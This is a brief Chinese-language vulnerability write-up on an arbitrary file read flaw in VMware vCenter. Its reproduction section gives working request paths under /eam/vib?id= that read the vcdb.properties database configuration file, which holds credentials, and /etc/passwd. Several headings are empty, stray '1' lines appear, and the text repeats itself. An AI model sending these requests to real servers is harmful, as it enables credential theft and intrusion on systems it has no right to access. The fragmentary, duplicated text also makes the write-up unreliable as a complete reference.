# VMware vCenter vid 任意文件读取漏洞
# 漏洞描述
VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件、
# 漏洞影响
# 网络测绘
# 漏洞复现
登录页面
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
1
/eam/vib?id=/etc/passwd
1
VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件、
登录页面
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/eam/vib?id=/etc/passwd